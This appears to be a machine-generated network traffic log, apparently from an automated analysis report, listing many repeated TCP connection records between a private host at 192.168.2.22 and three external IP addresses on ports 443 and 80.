                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 151.101.65.137:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
